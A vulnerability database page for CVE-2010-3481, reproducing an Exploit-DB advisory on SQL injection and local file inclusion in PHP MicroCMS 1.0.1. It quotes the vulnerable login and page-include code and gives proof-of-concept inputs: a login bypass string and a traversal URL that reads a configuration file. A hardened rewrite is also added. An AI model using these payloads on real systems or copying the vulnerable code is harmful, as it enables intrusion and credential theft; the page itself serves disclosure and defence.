CVE-2010-3481
Description
Multiple SQL injection vulnerabilities in login.php in ApPHP PHP MicroCMS 1.0.1, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) user_name and (2) password variables, possibly related to include/classes/Login.php. NOTE: some of these details are obtained from third party information. NOTE: the password vector might not be vulnerable.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
PHP microcms 1.0.1 - Multiple Vulnerabilities
http://www.exploit-db.com/moaub-15-php-microcms-1-0-1-multiple-remote-vulnerabilities/
Title : PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Affected Version : PHP MicroCMS <= 1.0.1
Vendor Site : www.apphp.com/php-microcms/index.php
Discovery : abysssec.com
Description :
This CMS has many critical vulnerabilities; we refer to some of them here:
Vulnerabilities :
1. Authentication bypass with SQL Injection in login page:
The user_name and password parameters received from the login form are passed to the do_login function:
login.php, lines 12-17:
```php
function Login() {
    $this->wrong_login = false;
    // Both POST values go straight to do_login(); nothing is validated or escaped here.
    if (!$this->is_logged_in() && $_POST['submit'] == "Login" && !empty($_POST['user_name']) && !empty($_POST['password']))
        $this->do_login($_POST['user_name'], $_POST['password']);
    else if ($_POST['submit_logout'] == "Logout")
        $this->do_logout();
    $this->accounts = new Profiles($GLOBALS['user_session']->get_session_variable("session_account_id"));
}
```
In the do_login function these parameters are passed to the get_account_information function:
login.php, lines 19-29:
```php
function do_login($user_name, $password, $do_redirect = true) {
    // Still no validation: the raw values are handed on to the query builder.
    if ($account_information = $this->get_account_information($user_name, $password)) {
        $this->set_session_variables($account_information);
        if ($do_redirect) {
            header("Location: index.php\r\n\r\n");
            exit;
        }
    } else {
        $this->wrong_login = true;
    }
}
```
Then these parameters, without any validation, are applied directly in the SQL query:
login.php, lines 48-55:
```php
function get_account_information($user_name, $password) {
    // vulnerability here: $user_name is concatenated into the WHERE clause
    // vulnerability here: $password is concatenated into AES_ENCRYPT(...)
    $sql = "SELECT ".DB_PREFIX."accounts.*, user_name AS account_name
            FROM ".DB_PREFIX."accounts
            WHERE
            user_name = '" . $user_name . "' AND
            password = AES_ENCRYPT('" . $password . "', '" . DB_ENCRYPT_KEY . "')";
    return database_query($sql, DATA_ONLY, FIRST_ROW_ONLY);
}
```
POC:
In the login page, enter:
username: a' or '1'='1
password: a' or '1'='1
----------------------------------------------------------------------------------------------------
2. Local File Inclusion:
index.php, line 21:
```php
// The "page" request parameter is used as-is, defaulting to "home".
$page = !empty($_GET['page']) ? $_GET['page'] : "home";
```
index.php, lines 104-105:
```php
// The unvalidated value is concatenated into a path and required directly.
if (($page != "") && file_exists("page/" . $page . ".php")) {
    require("page/" . $page . ".php");
    // ...
}
```
POC:
http://localhost/microcms/index.php?page=../include/base.inc.php%00
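As an added example, not code from the advisory or from ApPHP, here are hardened versions of the two functions quoted above: the login query rewritten with bound parameters, and the page include resolved against an allowlist of real files. It assumes a PDO connection `$db` to the same MySQL database and reuses the page's `DB_PREFIX` and `DB_ENCRYPT_KEY` constants; the function names and the `$page_dir` parameter are constructed for this example.

```php
<?php
// Added example (not ApPHP MicroCMS code). Assumes a PDO connection $db and the
// DB_PREFIX / DB_ENCRYPT_KEY constants the original login.php defines.

// 1. login.php: bind user_name and password instead of concatenating them.
//    The query shape, including AES_ENCRYPT on the password, is unchanged; the
//    values are sent as data, so a' or '1'='1 is compared literally and matches
//    no account.
function get_account_information(PDO $db, string $user_name, string $password): ?array {
    $sql = "SELECT " . DB_PREFIX . "accounts.*, user_name AS account_name
            FROM " . DB_PREFIX . "accounts
            WHERE user_name = :user_name
              AND password = AES_ENCRYPT(:password, :key)";
    $stmt = $db->prepare($sql);
    $stmt->execute([
        ':user_name' => $user_name,
        ':password'  => $password,
        ':key'       => DB_ENCRYPT_KEY,
    ]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 2. index.php: map the "page" parameter onto files that actually exist in
//    page/ and only ever concatenate a known basename. Traversal sequences and
//    a %00 byte never reach require(), because the request value is used only
//    as an array key, never as part of the path.
function resolve_page(string $requested, string $page_dir = __DIR__ . '/page'): string {
    $allowed = [];
    foreach (glob($page_dir . '/*.php') ?: [] as $file) {
        $allowed[basename($file, '.php')] = $file;
    }
    // Anything unknown falls back to "home", the default the original code uses.
    if ($requested === '' || !isset($allowed[$requested])) {
        $requested = 'home';
    }
    return $allowed[$requested] ?? $page_dir . '/home.php';
}

// Usage at the top of index.php:
// require(resolve_page($_GET['page'] ?? ''));
```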
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| apphp | php_microcms | 1.0.1 | |
References
- http://osvdb.org/68073
- http://secunia.com/advisories/41455
- http://secunia.com/advisories/41492
- http://www.attrition.org/pipermail/vim/2010-September/002439.html
- http://www.exploit-db.com/exploits/15011
- http://www.securityfocus.com/bid/43232
- https://exchange.xforce.ibmcloud.com/vulnerabilities/61810
CWEs
CWE-89